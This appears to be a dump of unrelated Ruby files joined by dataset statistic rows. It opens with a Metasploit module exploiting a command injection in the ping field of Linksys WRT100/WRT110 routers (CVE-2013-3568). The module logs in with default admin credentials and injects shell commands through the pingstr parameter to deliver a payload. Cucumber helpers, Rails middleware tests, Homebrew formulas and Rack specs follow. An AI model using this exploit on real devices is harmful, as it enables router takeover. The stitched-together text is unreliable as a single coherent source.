Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys Devices pingstr Remote Command Injection',
'Description' => %q{
The Linksys WRT100 and WRT110 consumer routers are vulnerable to a command
injection exploit in the ping field of the web interface.
},
'Author' =>
[
'Craig Young', # Vulnerability discovery
'joev', # msf module
'juan vazquez' # module help + echo cmd stager
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-3568'],
['BID', '61151'],
['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
],
'DisclosureDate' => 'Jul 12 2013',
'Privileged' => true,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSLE,
'Targets' =>
[
['Linux mipsel Payload', { } ]
],
'DefaultTarget' => 0,
))
register_options([
OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/HNAP1/'
})
rescue ::Rex::ConnectionError
vprint_error("A connection error has occured")
return Exploit::CheckCode::Unknown
end
if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
test_login
execute_cmdstager
end
# Sends an HTTP request with authorization header to the router
# Raises an exception unless the login is successful
def test_login
print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
res = send_auth_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if not res or res.code == 401 or res.code == 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
else
print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
end
end
# Run the command on the router
def execute_command(cmd, opts)
send_auth_request_cgi({
'uri' => '/ping.cgi',
'method' => 'POST',
'vars_post' => {
'pingstr' => '& ' + cmd
}
})
Rex.sleep(1) # Give the device a second
end
# Helper methods
def user; datastore['USERNAME']; end
def pass; datastore['PASSWORD'] || ''; end
def send_auth_request_cgi(opts={}, timeout=nil)
timeout ||= datastore['TIMEOUT']
opts.merge!('authorization' => basic_auth(user, pass))
begin
send_request_cgi(opts, timeout)
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
end
end
end
| 27.983471 | 94 | 0.593621 |
1da703b402b7ca3b87bf4bc7ac93b9284ebaff48 | 1,326 | # -*- coding: utf-8 -*-
# frozen_string_literal: true
module FeatureFactory
def create_feature(name = generate_feature_name)
gherkin = <<-GHERKIN
Feature: #{name}
#{yield}
GHERKIN
write_file filename(name), gherkin
end
def create_feature_ja(name = generate_feature_name)
gherkin = <<-GHERKIN
# language: ja
機能: #{name}
#{yield}
GHERKIN
write_file filename(name), gherkin
end
def create_scenario(name = generate_scenario_name)
<<-GHERKIN
Scenario: #{name}
#{yield}
GHERKIN
end
def create_scenario_ja(name = generate_scenario_name)
<<-GHERKIN
シナリオ: #{name}
#{yield}
GHERKIN
end
def create_step_definition
write_file generate_step_definition_filename, yield
end
def generate_feature_name
"Test Feature #{next_increment(:feature)}"
end
def generate_scenario_name
"Test Scenario #{next_increment(:scenario)}"
end
def next_increment(label)
@increments ||= {}
@increments[label] ||= 0
@increments[label] += 1
end
def generate_step_definition_filename
"features/step_definitions/steps#{next_increment(:step_defs)}.rb"
end
def filename(name)
"features/#{name.downcase.tr(' ', '_')}.feature"
end
def features
in_current_dir do
Dir['features/*.feature']
end
end
end
World(FeatureFactory)
| 19.217391 | 69 | 0.692308 |
038dda0cdb077d780ad4a1a3d7873c53e94ffc7e | 7,048 | # frozen_string_literal: true
require "abstract_unit"
class MiddlewareStackTest < ActiveSupport::TestCase
class Base
def initialize(app)
@app = app
end
def call(env)
@app.call(env)
end
end
class FooMiddleware < Base; end
class BarMiddleware < Base; end
class BazMiddleware < Base; end
class HiyaMiddleware < Base; end
class BlockMiddleware < Base
attr_reader :block
def initialize(app, &block)
super(app)
@block = block
end
end
def setup
@stack = ActionDispatch::MiddlewareStack.new
@stack.use FooMiddleware
@stack.use BarMiddleware
end
def test_delete_works
assert_difference "@stack.size", -1 do
@stack.delete FooMiddleware
end
end
test "delete ignores middleware not in the stack" do
assert_no_difference "@stack.size" do
@stack.delete BazMiddleware
end
end
test "delete! deletes the middleware" do
assert_difference "@stack.size", -1 do
@stack.delete! FooMiddleware
end
end
test "delete! requires the middleware to be in the stack" do
assert_raises RuntimeError do
@stack.delete! BazMiddleware
end
end
test "use should push middleware as class onto the stack" do
assert_difference "@stack.size" do
@stack.use BazMiddleware
end
assert_equal BazMiddleware, @stack.last.klass
end
test "use should push middleware class with arguments onto the stack" do
assert_difference "@stack.size" do
@stack.use BazMiddleware, true, foo: "bar"
end
assert_equal BazMiddleware, @stack.last.klass
assert_equal([true, { foo: "bar" }], @stack.last.args)
end
test "use should push middleware class with block arguments onto the stack" do
proc = Proc.new { }
assert_difference "@stack.size" do
@stack.use(BlockMiddleware, &proc)
end
assert_equal BlockMiddleware, @stack.last.klass
assert_equal proc, @stack.last.block
end
test "insert inserts middleware at the integer index" do
@stack.insert(1, BazMiddleware)
assert_equal BazMiddleware, @stack[1].klass
end
test "insert_after inserts middleware after the integer index" do
@stack.insert_after(1, BazMiddleware)
assert_equal BazMiddleware, @stack[2].klass
end
test "insert_before inserts middleware before another middleware class" do
@stack.insert_before(BarMiddleware, BazMiddleware)
assert_equal BazMiddleware, @stack[1].klass
end
test "insert_after inserts middleware after another middleware class" do
@stack.insert_after(BarMiddleware, BazMiddleware)
assert_equal BazMiddleware, @stack[2].klass
end
test "swaps one middleware out for another" do
assert_equal FooMiddleware, @stack[0].klass
@stack.swap(FooMiddleware, BazMiddleware)
assert_equal BazMiddleware, @stack[0].klass
end
test "swaps one middleware out for same middleware class" do
assert_equal FooMiddleware, @stack[0].klass
@stack.swap(FooMiddleware, FooMiddleware, Proc.new { |env| [500, {}, ["error!"]] })
assert_equal FooMiddleware, @stack[0].klass
end
test "move moves middleware at the integer index" do
@stack.move(0, BarMiddleware)
assert_equal BarMiddleware, @stack[0].klass
assert_equal FooMiddleware, @stack[1].klass
end
test "move requires the moved middleware to be in the stack" do
assert_raises RuntimeError do
@stack.move(0, BazMiddleware)
end
end
test "move preserves the arguments of the moved middleware" do
@stack.use BazMiddleware, true, foo: "bar"
@stack.move_before(FooMiddleware, BazMiddleware)
assert_equal [true, foo: "bar"], @stack.first.args
end
test "move_before moves middleware before another middleware class" do
@stack.move_before(FooMiddleware, BarMiddleware)
assert_equal BarMiddleware, @stack[0].klass
assert_equal FooMiddleware, @stack[1].klass
end
test "move_after requires the moved middleware to be in the stack" do
assert_raises RuntimeError do
@stack.move_after(BarMiddleware, BazMiddleware)
end
end
test "move_after moves middleware after the integer index" do
@stack.insert_after(BarMiddleware, BazMiddleware)
@stack.move_after(0, BazMiddleware)
assert_equal FooMiddleware, @stack[0].klass
assert_equal BazMiddleware, @stack[1].klass
assert_equal BarMiddleware, @stack[2].klass
end
test "move_after moves middleware after another middleware class" do
@stack.insert_after(BarMiddleware, BazMiddleware)
@stack.move_after(BarMiddleware, FooMiddleware)
assert_equal BarMiddleware, @stack[0].klass
assert_equal FooMiddleware, @stack[1].klass
assert_equal BazMiddleware, @stack[2].klass
end
test "move_afters preserves the arguments of the moved middleware" do
@stack.use BazMiddleware, true, foo: "bar"
@stack.move_after(FooMiddleware, BazMiddleware)
assert_equal [true, foo: "bar"], @stack[1].args
end
test "unshift adds a new middleware at the beginning of the stack" do
@stack.unshift MiddlewareStackTest::BazMiddleware
assert_equal BazMiddleware, @stack.first.klass
end
test "raise an error on invalid index" do
assert_raise RuntimeError do
@stack.insert(HiyaMiddleware, BazMiddleware)
end
assert_raise RuntimeError do
@stack.insert_after(HiyaMiddleware, BazMiddleware)
end
end
test "can check if Middleware are equal - Class" do
assert_equal @stack.last, BarMiddleware
end
test "includes a class" do
assert_equal true, @stack.include?(BarMiddleware)
end
test "can check if Middleware are equal - Middleware" do
assert_equal @stack.last, @stack.last
end
test "instruments the execution of middlewares" do
events = []
subscriber = proc do |*args|
events << ActiveSupport::Notifications::Event.new(*args)
end
ActiveSupport::Notifications.subscribed(subscriber, "process_middleware.action_dispatch") do
app = @stack.build(proc { |env| [200, {}, []] })
env = {}
app.call(env)
end
assert_equal 2, events.count
assert_equal ["MiddlewareStackTest::BarMiddleware", "MiddlewareStackTest::FooMiddleware"], events.map { |e| e.payload[:middleware] }
end
test "includes a middleware" do
assert_equal true, @stack.include?(ActionDispatch::MiddlewareStack::Middleware.new(BarMiddleware, nil, nil))
end
test "referencing Rack::Runtime is deprecated" do
@stack.use ActionDispatch::MiddlewareStack::FakeRuntime
assert_deprecated(/Rack::Runtime is removed/) do
@stack.insert_after(Rack::Runtime, BazMiddleware)
end
end
test "referencing Rack::Runtime is not deprecated if added" do
assert_not_deprecated do
@stack.use Rack::Runtime
@stack.insert_before(Rack::Runtime, BazMiddleware)
end
end
test "referencing FakeRuntime throws an error" do
@stack.use ActionDispatch::MiddlewareStack::FakeRuntime
assert_raises RuntimeError do
@stack.insert_after ActionDispatch::MiddlewareStack::FakeRuntime, BazMiddleware
end
end
end
| 29.366667 | 136 | 0.722758 |
18d0e4f207704b206b852458544b4034e302a3dd | 674 | cask 'qutebrowser' do
version '1.8.3'
sha256 '547fe56e784771033c7d16b19327d49cb79509309de78c3ee5bf54fb976abcd6'
# github.com/qutebrowser/qutebrowser was verified as official when first introduced to the cask
url "https://github.com/qutebrowser/qutebrowser/releases/download/v#{version}/qutebrowser-#{version}.dmg"
appcast 'https://github.com/qutebrowser/qutebrowser/releases.atom'
name 'qutebrowser'
homepage 'https://www.qutebrowser.org/'
app 'qutebrowser.app'
zap trash: [
'~/Library/Application Support/qutebrowser',
'~/Library/Caches/qutebrowser',
'~/Library/Preferences/qutebrowser',
]
end
| 35.473684 | 107 | 0.709199 |
ab695d0e3c7dbfa6754279f7cf8bd4c051e5d25d | 2,895 | class Monetdb < Formula
desc "Column-store database"
homepage "https://www.monetdb.org/"
url "https://www.monetdb.org/downloads/sources/Jul2021-SP1/MonetDB-11.41.11.tar.xz"
sha256 "2e81a98e06820dfaf56770af027e8da4a8dcc533d3599b9cc2b5a2e1efdc07af"
license "MPL-2.0"
head "https://dev.monetdb.org/hg/MonetDB", using: :hg
livecheck do
url "https://www.monetdb.org/downloads/sources/Latest/"
regex(/href=.*?MonetDB[._-]v?(\d+(?:\.\d+)+)\.t/i)
end
bottle do
rebuild 1
sha256 arm64_monterey: "8bc5834738874ae3eff597b62da4a34666ada63521a830570c5b52670c706efa"
sha256 arm64_big_sur: "c3491e3822ad616ff62a23e7021602cbf0570b1bf4dd9a017aaa6f06d8e8f1e7"
sha256 monterey: "3c4655151f5defc6591f8de60e5abcdd1bf6a829ef6db47655c4bf5568116f02"
sha256 big_sur: "9b508ef49cdeca5aea1756bc7a31e84bf333aa05d1e4e17cb8b5b779c8641304"
sha256 catalina: "892532ddfa04ed8ab911227e8b1721d198b66281dd3614212d195d047474c41a"
sha256 x86_64_linux: "17e9eff85b2fe70e58bda46e6fa6a4c02ee8122cfa85707c6de985f948f8a579"
end
depends_on "bison" => :build # macOS bison is too old
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "[email protected]" => :build
depends_on "lz4"
depends_on "[email protected]"
depends_on "pcre"
depends_on "readline" # Compilation fails with libedit
depends_on "xz"
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args,
"-DRELEASE_VERSION=ON",
"-DASSERT=OFF",
"-DSTRICT=OFF",
"-DTESTING=OFF",
"-DFITS=OFF",
"-DGEOM=OFF",
"-DNETCDF=OFF",
"-DODBC=OFF",
"-DPY3INTEGRATION=OFF",
"-DRINTEGRATION=OFF",
"-DSHP=OFF",
"-DWITH_BZ2=ON",
"-DWITH_CMOCKA=OFF",
"-DWITH_CURL=ON",
"-DWITH_LZ4=ON",
"-DWITH_LZMA=ON",
"-DWITH_PCRE=ON",
"-DWITH_PROJ=OFF",
"-DWITH_SNAPPY=OFF",
"-DWITH_XML2=ON",
"-DWITH_ZLIB=ON",
"-DOPENSSL_ROOT_DIR=#{Formula["[email protected]"].opt_prefix}",
"-DREADLINE_ROOT=#{Formula["readline"].opt_prefix}"
# remove reference to shims directory from compilation/linking info
inreplace "tools/mserver/monet_version.c", %r{"/[^ ]*/}, "\""
system "cmake", "--build", "."
system "cmake", "--build", ".", "--target", "install"
end
end
test do
# assert_match "Usage", shell_output("#{bin}/mclient --help 2>&1")
system("#{bin}/monetdbd", "create", "#{testpath}/dbfarm")
assert_predicate testpath/"dbfarm", :exist?
end
end
| 39.657534 | 93 | 0.584801 |
79d0f1c1dce47ddd1421bf8c73b3eb30657b8a7a | 28,956 | require 'rack/utils'
require 'rack/mock'
describe Rack::Utils do
should "escape correctly" do
Rack::Utils.escape("fo<o>bar").should.equal "fo%3Co%3Ebar"
Rack::Utils.escape("a space").should.equal "a+space"
Rack::Utils.escape("q1!2\"'w$5&7/z8)?\\").
should.equal "q1%212%22%27w%245%267%2Fz8%29%3F%5C"
end
should "escape correctly for multibyte characters" do
matz_name = "\xE3\x81\xBE\xE3\x81\xA4\xE3\x82\x82\xE3\x81\xA8".unpack("a*")[0] # Matsumoto
matz_name.force_encoding("UTF-8") if matz_name.respond_to? :force_encoding
Rack::Utils.escape(matz_name).should.equal '%E3%81%BE%E3%81%A4%E3%82%82%E3%81%A8'
matz_name_sep = "\xE3\x81\xBE\xE3\x81\xA4 \xE3\x82\x82\xE3\x81\xA8".unpack("a*")[0] # Matsu moto
matz_name_sep.force_encoding("UTF-8") if matz_name_sep.respond_to? :force_encoding
Rack::Utils.escape(matz_name_sep).should.equal '%E3%81%BE%E3%81%A4+%E3%82%82%E3%81%A8'
end
should "unescape correctly" do
Rack::Utils.unescape("fo%3Co%3Ebar").should.equal "fo<o>bar"
Rack::Utils.unescape("a+space").should.equal "a space"
Rack::Utils.unescape("a%20space").should.equal "a space"
Rack::Utils.unescape("q1%212%22%27w%245%267%2Fz8%29%3F%5C").
should.equal "q1!2\"'w$5&7/z8)?\\"
end
should "parse query strings correctly" do
Rack::Utils.parse_query("foo=bar").
should.equal "foo" => "bar"
Rack::Utils.parse_query("foo=\"bar\"").
should.equal "foo" => "\"bar\""
Rack::Utils.parse_query("foo=bar&foo=quux").
should.equal "foo" => ["bar", "quux"]
Rack::Utils.parse_query("foo=1&bar=2").
should.equal "foo" => "1", "bar" => "2"
Rack::Utils.parse_query("my+weird+field=q1%212%22%27w%245%267%2Fz8%29%3F").
should.equal "my weird field" => "q1!2\"'w$5&7/z8)?"
Rack::Utils.parse_query("foo%3Dbaz=bar").should.equal "foo=baz" => "bar"
end
should "parse nested query strings correctly" do
Rack::Utils.parse_nested_query("foo").
should.equal "foo" => nil
Rack::Utils.parse_nested_query("foo=").
should.equal "foo" => ""
Rack::Utils.parse_nested_query("foo=bar").
should.equal "foo" => "bar"
Rack::Utils.parse_nested_query("foo=\"bar\"").
should.equal "foo" => "\"bar\""
Rack::Utils.parse_nested_query("foo=bar&foo=quux").
should.equal "foo" => "quux"
Rack::Utils.parse_nested_query("foo&foo=").
should.equal "foo" => ""
Rack::Utils.parse_nested_query("foo=1&bar=2").
should.equal "foo" => "1", "bar" => "2"
Rack::Utils.parse_nested_query("&foo=1&&bar=2").
should.equal "foo" => "1", "bar" => "2"
Rack::Utils.parse_nested_query("foo&bar=").
should.equal "foo" => nil, "bar" => ""
Rack::Utils.parse_nested_query("foo=bar&baz=").
should.equal "foo" => "bar", "baz" => ""
Rack::Utils.parse_nested_query("my+weird+field=q1%212%22%27w%245%267%2Fz8%29%3F").
should.equal "my weird field" => "q1!2\"'w$5&7/z8)?"
Rack::Utils.parse_nested_query("foo[]").
should.equal "foo" => [nil]
Rack::Utils.parse_nested_query("foo[]=").
should.equal "foo" => [""]
Rack::Utils.parse_nested_query("foo[]=bar").
should.equal "foo" => ["bar"]
Rack::Utils.parse_nested_query("foo[]=1&foo[]=2").
should.equal "foo" => ["1", "2"]
Rack::Utils.parse_nested_query("foo=bar&baz[]=1&baz[]=2&baz[]=3").
should.equal "foo" => "bar", "baz" => ["1", "2", "3"]
Rack::Utils.parse_nested_query("foo[]=bar&baz[]=1&baz[]=2&baz[]=3").
should.equal "foo" => ["bar"], "baz" => ["1", "2", "3"]
Rack::Utils.parse_nested_query("x[y][z]=1").
should.equal "x" => {"y" => {"z" => "1"}}
Rack::Utils.parse_nested_query("x[y][z][]=1").
should.equal "x" => {"y" => {"z" => ["1"]}}
Rack::Utils.parse_nested_query("x[y][z]=1&x[y][z]=2").
should.equal "x" => {"y" => {"z" => "2"}}
Rack::Utils.parse_nested_query("x[y][z][]=1&x[y][z][]=2").
should.equal "x" => {"y" => {"z" => ["1", "2"]}}
Rack::Utils.parse_nested_query("x[y][][z]=1").
should.equal "x" => {"y" => [{"z" => "1"}]}
Rack::Utils.parse_nested_query("x[y][][z][]=1").
should.equal "x" => {"y" => [{"z" => ["1"]}]}
Rack::Utils.parse_nested_query("x[y][][z]=1&x[y][][w]=2").
should.equal "x" => {"y" => [{"z" => "1", "w" => "2"}]}
Rack::Utils.parse_nested_query("x[y][][v][w]=1").
should.equal "x" => {"y" => [{"v" => {"w" => "1"}}]}
Rack::Utils.parse_nested_query("x[y][][z]=1&x[y][][v][w]=2").
should.equal "x" => {"y" => [{"z" => "1", "v" => {"w" => "2"}}]}
Rack::Utils.parse_nested_query("x[y][][z]=1&x[y][][z]=2").
should.equal "x" => {"y" => [{"z" => "1"}, {"z" => "2"}]}
Rack::Utils.parse_nested_query("x[y][][z]=1&x[y][][w]=a&x[y][][z]=2&x[y][][w]=3").
should.equal "x" => {"y" => [{"z" => "1", "w" => "a"}, {"z" => "2", "w" => "3"}]}
lambda { Rack::Utils.parse_nested_query("x[y]=1&x[y]z=2") }.
should.raise(TypeError).
message.should.equal "expected Hash (got String) for param `y'"
lambda { Rack::Utils.parse_nested_query("x[y]=1&x[]=1") }.
should.raise(TypeError).
message.should.equal "expected Array (got Hash) for param `x'"
lambda { Rack::Utils.parse_nested_query("x[y]=1&x[y][][w]=2") }.
should.raise(TypeError).
message.should.equal "expected Array (got String) for param `y'"
end
should "build query strings correctly" do
Rack::Utils.build_query("foo" => "bar").should.equal "foo=bar"
Rack::Utils.build_query("foo" => ["bar", "quux"]).
should.equal "foo=bar&foo=quux"
Rack::Utils.build_query("foo" => "1", "bar" => "2").
should.equal "foo=1&bar=2"
Rack::Utils.build_query("my weird field" => "q1!2\"'w$5&7/z8)?").
should.equal "my+weird+field=q1%212%22%27w%245%267%2Fz8%29%3F"
end
should "build nested query strings correctly" do
Rack::Utils.build_nested_query("foo" => nil).should.equal "foo"
Rack::Utils.build_nested_query("foo" => "").should.equal "foo="
Rack::Utils.build_nested_query("foo" => "bar").should.equal "foo=bar"
Rack::Utils.build_nested_query("foo" => "1", "bar" => "2").
should.equal "foo=1&bar=2"
Rack::Utils.build_nested_query("my weird field" => "q1!2\"'w$5&7/z8)?").
should.equal "my+weird+field=q1%212%22%27w%245%267%2Fz8%29%3F"
Rack::Utils.build_nested_query("foo" => [nil]).
should.equal "foo[]"
Rack::Utils.build_nested_query("foo" => [""]).
should.equal "foo[]="
Rack::Utils.build_nested_query("foo" => ["bar"]).
should.equal "foo[]=bar"
# The ordering of the output query string is unpredictable with 1.8's
# unordered hash. Test that build_nested_query performs the inverse
# function of parse_nested_query.
[{"foo" => nil, "bar" => ""},
{"foo" => "bar", "baz" => ""},
{"foo" => ["1", "2"]},
{"foo" => "bar", "baz" => ["1", "2", "3"]},
{"foo" => ["bar"], "baz" => ["1", "2", "3"]},
{"foo" => ["1", "2"]},
{"foo" => "bar", "baz" => ["1", "2", "3"]},
{"x" => {"y" => {"z" => "1"}}},
{"x" => {"y" => {"z" => ["1"]}}},
{"x" => {"y" => {"z" => ["1", "2"]}}},
{"x" => {"y" => [{"z" => "1"}]}},
{"x" => {"y" => [{"z" => ["1"]}]}},
{"x" => {"y" => [{"z" => "1", "w" => "2"}]}},
{"x" => {"y" => [{"v" => {"w" => "1"}}]}},
{"x" => {"y" => [{"z" => "1", "v" => {"w" => "2"}}]}},
{"x" => {"y" => [{"z" => "1"}, {"z" => "2"}]}},
{"x" => {"y" => [{"z" => "1", "w" => "a"}, {"z" => "2", "w" => "3"}]}}
].each { |params|
qs = Rack::Utils.build_nested_query(params)
Rack::Utils.parse_nested_query(qs).should.equal params
}
lambda { Rack::Utils.build_nested_query("foo=bar") }.
should.raise(ArgumentError).
message.should.equal "value must be a Hash"
end
should "should escape html entities [&><'\"/]" do
Rack::Utils.escape_html("foo").should.equal "foo"
Rack::Utils.escape_html("f&o").should.equal "f&o"
Rack::Utils.escape_html("f<o").should.equal "f<o"
Rack::Utils.escape_html("f>o").should.equal "f>o"
Rack::Utils.escape_html("f'o").should.equal "f'o"
Rack::Utils.escape_html('f"o').should.equal "f"o"
Rack::Utils.escape_html("f/o").should.equal "f/o"
Rack::Utils.escape_html("<foo></foo>").should.equal "<foo></foo>"
end
should "figure out which encodings are acceptable" do
helper = lambda do |a, b|
request = Rack::Request.new(Rack::MockRequest.env_for("", "HTTP_ACCEPT_ENCODING" => a))
Rack::Utils.select_best_encoding(a, b)
end
helper.call(%w(), [["x", 1]]).should.equal(nil)
helper.call(%w(identity), [["identity", 0.0]]).should.equal(nil)
helper.call(%w(identity), [["*", 0.0]]).should.equal(nil)
helper.call(%w(identity), [["compress", 1.0], ["gzip", 1.0]]).should.equal("identity")
helper.call(%w(compress gzip identity), [["compress", 1.0], ["gzip", 1.0]]).should.equal("compress")
helper.call(%w(compress gzip identity), [["compress", 0.5], ["gzip", 1.0]]).should.equal("gzip")
helper.call(%w(foo bar identity), []).should.equal("identity")
helper.call(%w(foo bar identity), [["*", 1.0]]).should.equal("foo")
helper.call(%w(foo bar identity), [["*", 1.0], ["foo", 0.9]]).should.equal("bar")
helper.call(%w(foo bar identity), [["foo", 0], ["bar", 0]]).should.equal("identity")
helper.call(%w(foo bar baz identity), [["*", 0], ["identity", 0.1]]).should.equal("identity")
end
should "return the bytesize of String" do
Rack::Utils.bytesize("FOO\xE2\x82\xAC").should.equal 6
end
should "return status code for integer" do
Rack::Utils.status_code(200).should.equal 200
end
should "return status code for string" do
Rack::Utils.status_code("200").should.equal 200
end
should "return status code for symbol" do
Rack::Utils.status_code(:ok).should.equal 200
end
end
describe Rack::Utils, "byte_range" do
should "ignore missing or syntactically invalid byte ranges" do
Rack::Utils.byte_ranges({},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "foobar"},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "furlongs=123-456"},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes="},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-"},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=123,456"},500).should.equal nil
# A range of non-positive length is syntactically invalid and ignored:
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=456-123"},500).should.equal nil
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=456-455"},500).should.equal nil
end
should "parse simple byte ranges" do
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=123-456"},500).should.equal [(123..456)]
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=123-"},500).should.equal [(123..499)]
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-100"},500).should.equal [(400..499)]
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=0-0"},500).should.equal [(0..0)]
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=499-499"},500).should.equal [(499..499)]
end
should "truncate byte ranges" do
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=123-999"},500).should.equal [(123..499)]
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=600-999"},500).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-999"},500).should.equal [(0..499)]
end
should "ignore unsatisfiable byte ranges" do
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=500-501"},500).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=500-"},500).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=999-"},500).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-0"},500).should.equal []
end
should "handle byte ranges of empty files" do
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=123-456"},0).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=0-"},0).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-100"},0).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=0-0"},0).should.equal []
Rack::Utils.byte_ranges({"HTTP_RANGE" => "bytes=-0"},0).should.equal []
end
end
describe Rack::Utils::HeaderHash do
should "retain header case" do
h = Rack::Utils::HeaderHash.new("Content-MD5" => "d5ff4e2a0 ...")
h['ETag'] = 'Boo!'
h.to_hash.should.equal "Content-MD5" => "d5ff4e2a0 ...", "ETag" => 'Boo!'
end
should "check existence of keys case insensitively" do
h = Rack::Utils::HeaderHash.new("Content-MD5" => "d5ff4e2a0 ...")
h.should.include 'content-md5'
h.should.not.include 'ETag'
end
should "merge case-insensitively" do
h = Rack::Utils::HeaderHash.new("ETag" => 'HELLO', "content-length" => '123')
merged = h.merge("Etag" => 'WORLD', 'Content-Length' => '321', "Foo" => 'BAR')
merged.should.equal "Etag"=>'WORLD', "Content-Length"=>'321', "Foo"=>'BAR'
end
should "overwrite case insensitively and assume the new key's case" do
h = Rack::Utils::HeaderHash.new("Foo-Bar" => "baz")
h["foo-bar"] = "bizzle"
h["FOO-BAR"].should.equal "bizzle"
h.length.should.equal 1
h.to_hash.should.equal "foo-bar" => "bizzle"
end
should "be converted to real Hash" do
h = Rack::Utils::HeaderHash.new("foo" => "bar")
h.to_hash.should.be.instance_of Hash
end
should "convert Array values to Strings when converting to Hash" do
h = Rack::Utils::HeaderHash.new("foo" => ["bar", "baz"])
h.to_hash.should.equal({ "foo" => "bar\nbaz" })
end
should "replace hashes correctly" do
h = Rack::Utils::HeaderHash.new("Foo-Bar" => "baz")
j = {"foo" => "bar"}
h.replace(j)
h["foo"].should.equal "bar"
end
should "be able to delete the given key case-sensitively" do
h = Rack::Utils::HeaderHash.new("foo" => "bar")
h.delete("foo")
h["foo"].should.be.nil
h["FOO"].should.be.nil
end
should "be able to delete the given key case-insensitively" do
h = Rack::Utils::HeaderHash.new("foo" => "bar")
h.delete("FOO")
h["foo"].should.be.nil
h["FOO"].should.be.nil
end
should "return the deleted value when #delete is called on an existing key" do
h = Rack::Utils::HeaderHash.new("foo" => "bar")
h.delete("Foo").should.equal("bar")
end
should "return nil when #delete is called on a non-existant key" do
h = Rack::Utils::HeaderHash.new("foo" => "bar")
h.delete("Hello").should.be.nil
end
should "avoid unnecessary object creation if possible" do
a = Rack::Utils::HeaderHash.new("foo" => "bar")
b = Rack::Utils::HeaderHash.new(a)
b.object_id.should.equal(a.object_id)
b.should.equal(a)
end
should "convert Array values to Strings when responding to #each" do
h = Rack::Utils::HeaderHash.new("foo" => ["bar", "baz"])
h.each do |k,v|
k.should.equal("foo")
v.should.equal("bar\nbaz")
end
end
should "not create headers out of thin air" do
h = Rack::Utils::HeaderHash.new
h['foo']
h['foo'].should.be.nil
h.should.not.include 'foo'
end
end
describe Rack::Utils::Context do
class ContextTest
attr_reader :app
def initialize app; @app=app; end
def call env; context env; end
def context env, app=@app; app.call(env); end
end
test_target1 = proc{|e| e.to_s+' world' }
test_target2 = proc{|e| e.to_i+2 }
test_target3 = proc{|e| nil }
test_target4 = proc{|e| [200,{'Content-Type'=>'text/plain', 'Content-Length'=>'0'},['']] }
test_app = ContextTest.new test_target4
should "set context correctly" do
test_app.app.should.equal test_target4
c1 = Rack::Utils::Context.new(test_app, test_target1)
c1.for.should.equal test_app
c1.app.should.equal test_target1
c2 = Rack::Utils::Context.new(test_app, test_target2)
c2.for.should.equal test_app
c2.app.should.equal test_target2
end
should "alter app on recontexting" do
c1 = Rack::Utils::Context.new(test_app, test_target1)
c2 = c1.recontext(test_target2)
c2.for.should.equal test_app
c2.app.should.equal test_target2
c3 = c2.recontext(test_target3)
c3.for.should.equal test_app
c3.app.should.equal test_target3
end
should "run different apps" do
c1 = Rack::Utils::Context.new test_app, test_target1
c2 = c1.recontext test_target2
c3 = c2.recontext test_target3
c4 = c3.recontext test_target4
a4 = Rack::Lint.new c4
a5 = Rack::Lint.new test_app
r1 = c1.call('hello')
r1.should.equal 'hello world'
r2 = c2.call(2)
r2.should.equal 4
r3 = c3.call(:misc_symbol)
r3.should.be.nil
r4 = Rack::MockRequest.new(a4).get('/')
r4.status.should.equal 200
r5 = Rack::MockRequest.new(a5).get('/')
r5.status.should.equal 200
r4.body.should.equal r5.body
end
end
describe Rack::Utils::Multipart do
def multipart_fixture(name)
file = multipart_file(name)
data = File.open(file, 'rb') { |io| io.read }
type = "multipart/form-data; boundary=AaB03x"
length = data.respond_to?(:bytesize) ? data.bytesize : data.size
{ "CONTENT_TYPE" => type,
"CONTENT_LENGTH" => length.to_s,
:input => StringIO.new(data) }
end
def multipart_file(name)
File.join(File.dirname(__FILE__), "multipart", name.to_s)
end
should "return nil if content type is not multipart" do
env = Rack::MockRequest.env_for("/",
"CONTENT_TYPE" => 'application/x-www-form-urlencoded')
